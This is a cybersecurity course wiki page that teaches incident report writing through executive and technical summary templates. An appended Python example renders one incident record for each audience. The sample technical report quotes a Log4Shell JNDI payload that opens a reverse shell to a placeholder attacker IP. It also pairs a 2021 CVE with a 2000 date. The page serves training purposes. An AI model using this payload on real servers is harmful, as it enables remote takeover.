Report Writing - whiteowl911/leveleffect GitHub Wiki
This lab aims to introduce some core report-writing components and give the student a template to refer to for future reports.
While technical skills and acumen are core components to the cybersecurity field, they mean next to nothing if the findings and results cannot be properly communicated to a technical and non-technical audience. Imagine yourself in the following scenario:
You’re working at a company as a Cyber Security Analyst when you receive multiple alerts to investigate. The alert indicates that multiple suspicious executable files have been downloaded over HTTP. Your security suite started recording a pcap of the initial download as well. What do you do?
For this lab, your instructor will provide a walkthrough of a compromise and begin to formulate a report to summarize what happened. Refer to the fields and descriptions below in your own reports for the duration of the class!
We can use generic terms here:
- A user’s workstation
- A user account
- A server
- Domain
How would you summarize this attack if you were talking to a five-year-old?
Your audience is an executive - what information do they need to know?
- What is the extent of the attack?
- Do we know what (if any) data was taken?
- How would our business be impacted?
Does this impact or have the potential to impact any of the following?
- Confidentiality
  - Can users/threat actors access data/systems that they shouldn’t as a result?
- Integrity
  - Is the integrity of our systems/applications/data compromised?
- Availability
  - Is access to critical resources negatively impacted as a result?
- When did this attack occur?
- Where in the network did this attack occur?
- Was there more than one machine involved? Do we know at this time?
What general techniques did they use?
- A user opened a phishing email
- A vulnerability in our server was exploited
On November 5th 2000 at 12:00:00, one of our public servers was compromised through a vulnerability. This server houses customer data; however, it appears the threat actor only accessed files that are already listed on our public website.
Use specific terms here:
- Workstation EC2AMAZ-HOSTNAME
- An Administrator account/user Elliot Alderman
- IP address of machine
- IP address/domain of attacker
How would you summarize this attack if you were talking to one of your instructors?
Your audience is a technical manager - what information do they need to know?
- What is a chronological synopsis of the attack?
- What techniques did they employ?
- How were they detected? Can we detect this moving forward?
Does this impact or have the potential to impact any of the following?
- Confidentiality
  - Can users/threat actors access data/systems that they shouldn’t as a result?
- Integrity
  - Is the integrity of our systems/applications/data compromised?
- Availability
  - Is access to critical resources negatively impacted as a result?
- When did this attack occur?
- Where in the network did this attack occur?
- Was there more than one machine involved? Do we know at this time?
What specific techniques did they use?
- A user opened a phishing email containing a malicious .hta file with an embedded VBS macro.
- The vulnerability CVE-2021-44228 was exploited using xyz…
On November 5th 2000 at 12:00:00, our public-facing FTP server was compromised via CVE-2021-44228 using the payload "${jndi:ldap://<attackerIP>:1389**/Basic/ReverseShell/<attackerIP>/9999}". The payload points to a compromised server hosted at <URL or IP>. After the initial compromise, it appears the threat actor exfiltrated files that are already publicly available on our website rather than any customer data.
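As an added example (not part of this wiki page and not the course's own material), the Python sketch below keeps a single incident record and renders it twice: once with the generic terms the executive summary calls for, and once with the specific hostnames, accounts and CVE the technical summary calls for. It also checks the record against the template's questions (all three CIA impacts assessed, a timeline that exists and carries timezones, assets named) and sorts the timeline chronologically however the analyst entered it. The class and function names, the hostname ftp-srv-01 and the individual timeline events are assumptions made for the sample; EC2AMAZ-HOSTNAME, Elliot Alderman, CVE-2021-44228 and the date come from the page's own examples.

```python
"""One incident record, two audiences. Example code for the wiki, not course material."""
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Dict, List

REQUIRED_CIA = ("confidentiality", "integrity", "availability")


@dataclass
class TimelineEvent:
    when: datetime  # must be timezone-aware; always rendered in UTC
    what: str       # written with specific names; generalized for executives


@dataclass
class IncidentReport:
    # specific term (hostname, account, CVE) -> generic wording for executives
    specifics: Dict[str, str]
    # "confidentiality" / "integrity" / "availability" -> impacted?
    cia_impact: Dict[str, bool]
    timeline: List[TimelineEvent]
    general_techniques: List[str]    # e.g. "A vulnerability in our server was exploited"
    specific_techniques: List[str]   # e.g. "CVE-2021-44228 exploited on ..."
    data_taken: str
    business_impact: str


def validate(report: IncidentReport) -> List[str]:
    """Return the template questions the report still leaves unanswered."""
    problems = []
    for key in REQUIRED_CIA:
        if key not in report.cia_impact:
            problems.append(f"{key} impact not assessed")
    if not report.timeline:
        problems.append("timeline is empty: when did this attack occur?")
    for ev in report.timeline:
        if ev.when.tzinfo is None:
            problems.append(f"timestamp without timezone: {ev.what!r}")
    if not report.specifics:
        problems.append("no assets listed: where in the network did this occur?")
    return problems


def chronological(report: IncidentReport) -> List[TimelineEvent]:
    """Timeline sorted by UTC time, regardless of the order it was entered in."""
    return sorted(report.timeline, key=lambda ev: ev.when.astimezone(timezone.utc))


def generalize(text: str, specifics: Dict[str, str]) -> str:
    """Swap every specific term for its generic wording (longest terms first)."""
    for specific, generic in sorted(specifics.items(), key=lambda kv: -len(kv[0])):
        text = text.replace(specific, generic)
    return text


def leaked_specifics(text: str, specifics: Dict[str, str]) -> List[str]:
    """Specific terms that still appear in text meant for a non-technical audience."""
    return [term for term in specifics if term in text]


def render_executive(report: IncidentReport) -> str:
    """Extent, data taken, business impact and CIA effect, in generic terms only."""
    events = chronological(report)
    first = events[0].when.astimezone(timezone.utc)
    last = events[-1].when.astimezone(timezone.utc)
    impacted = [k for k in REQUIRED_CIA if report.cia_impact.get(k)]
    lines = [
        f"When: {first:%Y-%m-%d %H:%M} to {last:%Y-%m-%d %H:%M} UTC",
        "Extent: " + "; ".join(ev.what for ev in events),
        "Data taken: " + report.data_taken,
        "Business impact: " + report.business_impact,
        "Affects: " + (", ".join(impacted) if impacted else "none identified"),
        "What happened: " + "; ".join(report.general_techniques),
    ]
    return generalize("\n".join(lines), report.specifics)


def render_technical(report: IncidentReport) -> str:
    """Chronological synopsis with specific hosts, accounts and techniques."""
    lines = ["Chronological synopsis (UTC):"]
    for ev in chronological(report):
        lines.append(f"  {ev.when.astimezone(timezone.utc):%Y-%m-%d %H:%M:%S}  {ev.what}")
    lines.append("Assets/indicators: " + ", ".join(report.specifics))
    lines.append("Techniques: " + "; ".join(report.specific_techniques))
    lines.append("Data taken: " + report.data_taken)
    return "\n".join(lines)


# Constructed sample built from the wiki's example. ftp-srv-01 is a placeholder
# hostname (the wiki does not name the FTP server); the events are illustrative.
UTC = timezone.utc
SAMPLE = IncidentReport(
    specifics={
        "ftp-srv-01": "a public-facing server",
        "EC2AMAZ-HOSTNAME": "a user's workstation",
        "Elliot Alderman": "an administrator",
        "CVE-2021-44228": "a known vulnerability",
    },
    cia_impact={"confidentiality": True, "integrity": False, "availability": False},
    timeline=[  # deliberately out of order
        TimelineEvent(datetime(2000, 11, 5, 12, 30, tzinfo=UTC),
                      "Outbound transfer of public website files from ftp-srv-01"),
        TimelineEvent(datetime(2000, 11, 5, 12, 0, 0, tzinfo=UTC),
                      "CVE-2021-44228 exploited on ftp-srv-01"),
        TimelineEvent(datetime(2000, 11, 5, 12, 10, tzinfo=UTC),
                      "Elliot Alderman account used from EC2AMAZ-HOSTNAME"),
    ],
    general_techniques=["A vulnerability in our server was exploited"],
    specific_techniques=["CVE-2021-44228 exploited on the public-facing FTP server"],
    data_taken="only files already listed on our public website",
    business_impact="low; no customer data appears to have been accessed",
)

if __name__ == "__main__":
    print(render_executive(SAMPLE), "\n")
    print(render_technical(SAMPLE))
```

The executive text is produced by passing the same record through `generalize`, and `leaked_specifics` is the check that no hostname, account or CVE slipped into it; the technical text keeps every specific term, which is exactly the difference the two halves of the template above describe.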